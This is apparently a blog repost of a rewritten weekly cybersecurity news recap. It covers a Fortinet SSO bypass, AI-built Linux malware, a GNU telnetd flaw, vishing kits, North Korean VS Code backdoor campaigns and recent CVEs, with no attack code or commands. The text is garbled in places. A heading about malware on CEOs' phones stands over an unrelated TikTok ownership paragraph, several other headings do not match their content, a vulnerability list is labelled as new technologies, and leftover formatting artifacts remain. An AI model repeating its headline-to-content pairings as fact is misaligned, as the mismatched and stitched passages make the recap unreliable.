Weekly Recap of Cybersecurity Threats and Innovations

Bytecode :Blog :AWS Associate :Weekly Recap of Cybersecurity Threats and Innovations
CategoriesAWS Associate
byvaibhav

“`html




Rewireed Article: Weekly Recap of Cybersecurity Threats and Innovations

Weekly Recap of Cybersecurity Threats and Innovations

# Threat of the Week: Improperly Patched Fortinet Firewall Exploited Again

Fortinet confirmed it is working to completely plug a FortiCloud SSO authentication bypass vulnerability following reports of fresh exploitation activity on fully-patched firewalls. The activity has exploited incomplete patches for CVE-2025-59718 and CVE-2025-59719, allowing unauthenticated bypass of SSO login authentication via crafted SAML messages if the FortiCloud SSO feature is enabled.

  • Users are advised to restrict administrative access on edge network devices and disable FortiCloud SSO logins by turning off the “admin-forticloud-sso-login” setting.
  • The activity has been found exploiting an incomplete patch for CVE-2025-59718 and CVE-2025-59719, indicating a new attack path.

# From Fake Sites to Malware: Your CEO’s Phone May Not be Safe

TikTok officially announced it formed a joint venture that allows the app to continue operating in the U.S., ending years of regulatory uncertainty. The new deal includes selling ByteDance’s majority stake to an American group, while retaining a 19.9% stake.

# VoidLink: AI-Built Linux Malware with Sophisticated Features

VoidLink malware, targeting Linux-based cloud servers, was likely generated almost entirely by artificial intelligence (AI). The development plan and checkpoints indicate sophisticated, modern capabilities, underscoring how capable developers can amplify offensive capability using AI.

# Critical GNU InetUtils telnetd Flaw: Root Access Without Credentials

A critical security flaw in the GNU InetUtils telnet daemon was disclosed. A vulnerability tracked as CVE-2026-24061 affects all versions from 1.9.3 up to and including 2.7, allowing an attacker to establish a Telnet session without valid credentials, granting unauthorized access.

# Vishing Attacks: Identity Providers Compromised

Threat actors who specialize in voice phishing (vishing) have started using bespoke phishing kits that intercept targets’ login credentials while also controlling the authentication flow in real-time. The ShinyHunters extortion gang has claimed responsibility for some of these attacks.

# CrashFix Campaigns: Browser Extensions Deliver Malware

The North Korean threat actors behind the Contagious Interview campaign are now employing a new mechanism using Microsoft Visual Studio Code (VS Code) to deliver a previously unseen backdoor, enabling remote code execution on developer systems. This attack chain includes fake tasks.json files that execute malicious commands and install malware.

# Contagious Interview: Backdoors in Open Source Packages

The North Korean group is also using the realHunters campaign to deliver a backdoor by embedding a malicious npm package into VS Code extensions hosted on Vercel, GitLab, or Bitbucket. The attackers then use legitimate shells and tasks.json files to install this malware.

# Trending CVEs: Rapidly Exploited Security Flaws

  • CVE-2026-24061 (GNU InetUtils telnetd): Vulnerability allowing unauthorized access to the target system.
  • CVE-2026-23760 (SmarterMail), CVE-2026-20045 (Cisco Unified Communications and Webex Calling Dedicated Instance): Exploits affecting email and collaboration systems.
  • CVE-2026-1245 (binary-parser), CVE-2025-68143, CVE-2025-68144, CVE-2025-68145 (Anthropic mcp-server-git): Flaws in open-source software.
  • Vivotek legacy camera models: Vulnerability allowing remote code execution without authentication.

# New Cybersecurity Technologies and Initiatives

  • Patched FortiGate Devices Exploited Again: Attackers found a new attack path on fully patched devices despite previous patches.
  • OpenKM Software Flaws: Multiple zero-day vulnerabilities discovered, including those that could result in remote code execution and file disclosure.
  • Vivotek Firmware Vulnerability: Allows attackers to execute arbitrary code as root without authentication.

# Recent Incidents

  • Two Venezuelan Nationals Convicted for ATM Hacking Scheme. Two nationals were convicted of conspiracy and computer crimes for an ATM jackpotting scheme targeting older model ATMs throughout the southeastern United States.
  • Mamba PhaaS Kit Detailed: The Mamba phishing-as-a-service (PhaaS) kit, first observed in 2023, is used to deliver malware through email-based lures impersonating routine business communications.
  • New Stanley Kit for Chrome Extensions Sale: A threat actor offers a toolkit that can build malicious extensions with guaranteed publication on the Google Chrome Web Store.

Conclusion: Emphasizing Security Awareness and Practices

Risks are no longer isolated in specific tools but spread across everyday choices. Small gaps create significant vulnerabilities, underscoring the importance of vigilance in security practices. As attackers evolve, defenders must adapt swiftly to maintain resilience against evolving threats.

As a trusted cybersecurity platform, THN continuously monitors emerging trends and vulnerabilities, providing resources and insights to help enterprises protect themselves from growing cyber risks.



“`

Tags:
Prev
Malicious VS Code Extensions Steal Developer Data
Malicious VS Code Extensions Steal Developer Data
Next
Combined Defense Against AI Attacks
Combined Defense Against AI Attacks

Leave a Reply

Your email address will not be published. Required fields are marked *